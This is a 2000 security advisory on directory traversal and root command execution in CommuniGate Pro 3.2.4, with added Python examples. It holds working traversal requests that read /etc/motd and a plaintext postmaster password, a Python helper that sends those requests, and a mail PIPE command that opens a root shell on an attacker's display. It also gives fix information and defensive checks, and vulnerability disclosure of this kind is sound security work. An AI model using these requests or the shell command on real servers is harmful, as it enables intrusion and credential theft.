###############################################################
ID:        S21SEC-003-en
Title:     Vulnerabilities in Stalker's CommuniGate Pro v3.2.4
Date:      03/04/2000
Status:    Vendor contacted
Scope:     Remote command execution as superuser
Platforms: Linux, probably others
Author:    llmora, fjserna
Location:  http://www.s21sec.com/en/avisos/s21sec-003-en.txt
Release:   Public
###############################################################

                          S 2 1 S E C
                     http://www.s21sec.com

        Vulnerabilities in Stalker's CommuniGate Pro v3.2.4


About CommuniGate Pro
---------------------

CommuniGate Pro is a full-featured commercial mail server
(http://www.stalker.com/CommuniGatePro/). It does SMTP message routing
and provides POP, IMAP and HTTP access to mail, among other things.

The CommuniGate Pro mail server has a built-in web server that allows
users to read and send e-mail through the web, and allows the
administrator to remotely manage the mail server settings. By default it
listens on port 8100/tcp for web mail access and on port 8010/tcp for
web management access.


Vulnerability description
-------------------------

1. Reading any file on the mail server

CommuniGate provides a convenient mapping for the Web User Guide: the
URL /Guide/ is mapped to a directory in the CommuniGate installation
tree. The built-in web server suffers from the well-known "../.."
directory traversal problem. Requesting a document through the /Guide/
mapping of the administrative web server with the "../.." technique
returns the contents of the named file:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0

HTTP/1.0 200 OK
[... the /etc/motd file content is shown]
Connection closed by foreign host.
homer:~$

Because CommuniGate runs as root and does not drop privileges, any file
on the system can be read this way, e.g. /etc/shadow.
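The following is an added example, not part of the S21SEC advisory and not Stalker's code. It builds the raw HTTP/1.0 request typed by hand in the telnet session above, splits the response, and shows the path check the /Guide/ handler was missing. The document root (/var/CommuniGate/WebGuide), the host names and the handler logic are assumptions for illustration; the advisory does not show how CommuniGate resolves the mapping internally.

```python
import posixpath
import socket
from urllib.parse import unquote

GUIDE_PREFIX = "/Guide/"


def build_traversal_request(target_file, depth=15):
    """Return the raw HTTP/1.0 request typed into telnet in the advisory.

    target_file is an absolute path on the server (e.g. "/etc/motd");
    depth is how many "../" segments to prepend. Fifteen is more than
    enough to climb from the Guide directory to "/", and extra ones are
    harmless because ".." at the root stays at the root.
    """
    dotdots = "../" * depth
    url = GUIDE_PREFIX + dotdots + target_file.lstrip("/")
    return f"GET {url} HTTP/1.0\r\n\r\n".encode("ascii")


def fetch_raw(host, port, request, timeout=10.0):
    """Send request over a plain TCP socket and return the full response.

    Only for a lab host you are authorised to test; nothing in this block
    calls it.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def split_response(raw):
    """Split a raw HTTP/1.0 response into (status_line, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body


def resolve_under_root(url_path, guide_root):
    """Map a /Guide/... URL onto the filesystem, refusing anything that
    escapes guide_root. Returns the resolved path, or None if rejected.

    Hypothetical handler logic (assumption): the fix is the order of
    operations. Percent-decode first, join to the document root,
    normalise the result, and only then require that it still lies
    inside the root. Checking the URL string for ".." before decoding or
    before normalisation is what lets "%2e%2e" or "a/../../x" through.
    """
    if not url_path.startswith(GUIDE_PREFIX):
        return None
    relative = unquote(url_path[len(GUIDE_PREFIX):])
    root = posixpath.normpath(guide_root)
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate
```

Against a lab copy of the server, `split_response(fetch_raw(host, 8010, build_traversal_request("/etc/motd")))` returns the status line, the headers and the file body seen in the telnet session. `resolve_under_root` is the shape of the check a safe handler needs: the traversal URL above, a percent-encoded variant, and a "/Guide//etc/passwd" form are all rejected, while "/Guide/sub/../index.html" is still served because it normalises to a file inside the root.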
For example, the postmaster/manager settings file, which contains the
plaintext password for the management web interface, can be retrieved:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0

HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT

{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$

2. Remote execution of arbitrary commands as root

This is not a vulnerability in itself, but a demonstration of what can
be accomplished once an attacker has obtained the postmaster password.

Looking through the features of CommuniGate we find the PIPE feature,
which allows e-mail to be delivered to a program on the mail server. It
is disabled by default, but once the mail server settings are reachable
with the postmaster password it can simply be enabled: set the
application directory to /usr/X11R6/bin/, increase the maximum process
execution time, and send an e-mail to

    "xterm -display 172.16.2.4:0 -e /bin/sh"@pipe

which opens a root xterm on the attacker's desktop (172.16.2.4 in this
example).


Affected versions and platforms
-------------------------------

This bug has been tested on the Linux (Red Hat and non-Red Hat) v3.2.4
distribution, the latest stable release, found at www.stalker.com. It
has not been tested on other platforms or previous versions, though we
strongly believe the bug is platform independent and can probably be
found and reproduced in previous releases. Current beta versions (from
v3.3b2 onwards) do not suffer from this security problem.


Fix information
---------------

An upcoming stable release (v3.3) will fix this problem, and the current
v3.3 betas (v3.3b2 or newer) are already patched against this attack.
Upgrades are available from the vendor website at http://www.stalker.com.
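Returning to the account.settings file retrieved under vulnerability 1 above: the following is an added example, not part of the advisory and not Stalker's code. It parses the `{ key = value; ... }` dictionary format of that file and scans a set of account settings for plaintext Password entries, which is the check an administrator would want to run over their own Accounts tree after reading this advisory. The advisory shows only one flat dictionary; support for nested dictionaries and double-quoted values, and the Accounts/<name>.macnt/account.settings layout taken from the advisory's URL, are assumptions.

```python
import os
import re

# Constructed from the response body shown in the advisory (61 bytes).
SAMPLE_SETTINGS = "{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}"

# Token classes: braces, '=', ';', a double-quoted string, or a bare word.
# Whitespace matches without a capture group and is dropped.
_TOKEN_RE = re.compile(r'\s+|(\{|\}|=|;|"(?:[^"\\]|\\.)*"|[^\s{}=;"]+)')


def _tokenize(text):
    tokens, pos = [], 0
    while pos < len(text):
        match = _TOKEN_RE.match(text, pos)
        if match is None:
            raise ValueError(f"unexpected character {text[pos]!r} at offset {pos}")
        pos = match.end()
        if match.group(1) is not None:
            tokens.append(match.group(1))
    return tokens


def _unquote(token):
    """Strip surrounding double quotes and the two escapes we assume."""
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        return token[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return token


def _parse_dict(tokens, pos):
    """Parse a '{ ... }' dictionary starting at tokens[pos]; return (dict, next_pos)."""
    if tokens[pos] != "{":
        raise ValueError(f"expected '{{' at token {pos}")
    pos += 1
    result = {}
    while tokens[pos] != "}":
        key = _unquote(tokens[pos])
        if tokens[pos + 1] != "=":
            raise ValueError(f"expected '=' after key {key!r}")
        pos += 2
        if tokens[pos] == "{":
            value, pos = _parse_dict(tokens, pos)   # nested dictionary (assumption)
        else:
            value, pos = _unquote(tokens[pos]), pos + 1
        if tokens[pos] != ";":
            raise ValueError(f"expected ';' after value for {key!r}")
        pos += 1
        result[key] = value
    return result, pos + 1


def parse_settings(text):
    """Parse one account.settings file body into a (possibly nested) dict."""
    tokens = _tokenize(text)
    try:
        settings, end = _parse_dict(tokens, 0)
    except IndexError:
        raise ValueError("truncated settings file") from None
    if end != len(tokens):
        raise ValueError(f"trailing data after dictionary at token {end}")
    return settings


def iter_account_settings(accounts_dir):
    """Yield (account_name, file_text) for every <name>.macnt/account.settings."""
    for entry in sorted(os.listdir(accounts_dir)):
        if not entry.endswith(".macnt"):
            continue
        path = os.path.join(accounts_dir, entry, "account.settings")
        if os.path.isfile(path):
            with open(path, encoding="latin-1") as fh:
                yield entry[: -len(".macnt")], fh.read()


def scan_for_plaintext_passwords(accounts):
    """accounts: iterable of (account_name, settings_text).

    Returns (passwords, errors): passwords maps each account that carries a
    Password entry to its plaintext value; errors maps unparsable accounts
    to the parse error message so the scan does not silently skip them.
    """
    passwords, errors = {}, {}
    for name, text in accounts:
        try:
            settings = parse_settings(text)
        except ValueError as exc:
            errors[name] = str(exc)
            continue
        if "Password" in settings:
            passwords[name] = settings["Password"]
    return passwords, errors
```

On a real server the call is `scan_for_plaintext_passwords(iter_account_settings("/var/CommuniGate/Accounts"))`; every account it lists is one whose credential an attacker could have read through the /Guide/ traversal, and is a candidate for a password change once the server is upgraded.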
Additional information
----------------------

This vulnerability was found and researched by:

    Lluis Mora       llmora@s21sec.com
    Fermin J. Serna  fjserna@s21sec.com

You can find the latest version of this advisory at:

    http://www.s21sec.com/en/avisos/s21sec-003-en.txt

And other S21SEC advisories at:

    http://www.s21sec.com/en/avisos/